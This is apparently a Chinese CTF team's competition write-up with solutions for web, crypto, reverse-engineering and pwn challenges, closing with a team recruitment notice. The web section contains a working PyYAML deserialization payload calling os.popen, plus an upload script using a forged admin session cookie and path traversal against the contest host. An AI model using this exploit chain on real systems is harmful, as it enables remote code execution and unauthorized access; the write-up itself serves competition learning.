Web
签到
鼠标回退不刷新
web669
目录穿越读hostname伪造身份 绕过限制yaml rce 存在suid dd读flag到tmp目录下 每触发一次rce都要重新开一次容器 获取到flag 和suid
!!python/object/new:frozenset
- !!python/object/new:map
- !!python/name:os.popen
- ["bash /tmp/1/suanve"]
import requests
import os
# rarname = f"1"
rarname = f"fileinfo"
# 第一次 rarname 要为 1
# 第二次 rarname 要为 fileinfo
print(rarname)
print("/Users/suan/Downloads/rar/rar a '" + rarname + "'
f28f1f003578cfa35c012249c819edfa.yaml suanve")
os.system("/Users/suan/Downloads/rar/rar a '" + rarname + "'
f28f1f003578cfa35c012249c819edfa.yaml suanve")
burp0_url = "http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/upload"
burp0_cookies = {
"session":
"eyJ1cGRpciI6Ii4vIiwidXNlciI6IkFkbWluaXN0cmF0b3IifQ.YwhAgQ.zcTOfp
H44hAr6LcRs778nqfYi2Q"}
# 第一次 session dir 要为 /tmp/
# 第二次 session dir 要为 ./
# 创建目录
requests.get("http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/")
f = {"file": open(rarname+".rar", "rb")}
s = requests.post(burp0_url,
cookies=burp0_cookies, files=f)
print(s.text)
print("[!] path: " +
"static/uploads/f528764d624db129b32c21fbca0cb8d6/"+rarname+"/")
# s = os.popen("/Users/suan/tools/flask-session-cookiemanager/flask_session_cookie_manager3.py encode -t
'{\"updir\":\./\",\"user\":\"Administrator\"}' -s \"engine1\"").read()
print(s)
s = requests.get("http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/display?
file=1.yaml")
import requests
print(s.text)
burp0_url = "http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/..././..././.../
./..././..././..././..././..././..././..././..././..././..././...
/./..././..././..././..././..././..././..././..././..././..././tm
p/1"
s = requests.get(burp0_url)
print(s.text)
Crypto
crypto091
爆破hash,开个多线程很快,记得加上86。
import hashlib
num = 8617090000000
data =
'c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc
'
def getnum():
num = 8617090000000
for i in range(9999999):
num = num + 1
# print(num)
s = hashlib.sha256()
s.update(str(num).encode())
b = s.hexdigest()
# parameters_authentication("111", b, 1634884391)
print(num,b)
if b == data:
print('flag:{0}'.format(num))
break
import threading
thread1 = threading.Thread(name='t1',target=getnum)
thread2 = threading.Thread(name='t2',target=getnum)
thread3 = threading.Thread(name='t3',target=getnum)
thread1.start()
thread2.start()
thread3.start()
flag8617091733716
Re
re694
打开re.exe发现是个输入,丢exeinfope查一下壳,发现有个upx壳
用010查看发现把这个UPX改成了FUK,改回去用upx脱壳
直接使用upx.exe -d 进行脱壳
然后使用ida打开,找到start
然后shift+f12查看输入
找到这两个函数,里面有个计算公式
数组数据最后写脚本
data = [0x4B, 0x48, 0x79, 0x13, 0x45, 0x30, 0x5C, 0x49, 0x5A,
0x79, 0x13, 0x70, 0x6D, 0x78, 0x13, 0x6F, 0x48, 0x5D, 0x64, 0x64]
flag = ''
for i in range(20):
flag +=(chr((data[i]^0x50)-10^0x66))
print(flag)
flag{why_m0dify_pUx_SheLL}
re693
import re
s = open("challenge.go")
c = []
for i in s.readlines():
c.append(i.strip())
calls = {}
for i in range(len(c)):
if "return cHZv5op8rOmlAkb6(" in c[i]:
# 获取所有调用了cHZv5op8rOmlAkb6的函数
call = re.findall("[\w]{16}",c[i-4])[0]
cc = 0
for i2 in range(len(c)):
if f"return {call}()" in c[i2]:
cc += 1
print(call,cc)
#
#
# cat challenge.go|grep -E "\(.*\, gLIhR,.*\)"
a = open("t1")
for i in a.readlines():
if len(re.findall(r',',i))==5:
print(i)
最后试了n个函数得到flag
Pwn
pwn135
NC连上 尝试一波发现没 ban read
print(read('flag'))
<EOF>
Not we wil run your *.js with d8
flag{92394598-5bbf-4fd7-866a-da319bce9809}
done!
招新
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)
有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等)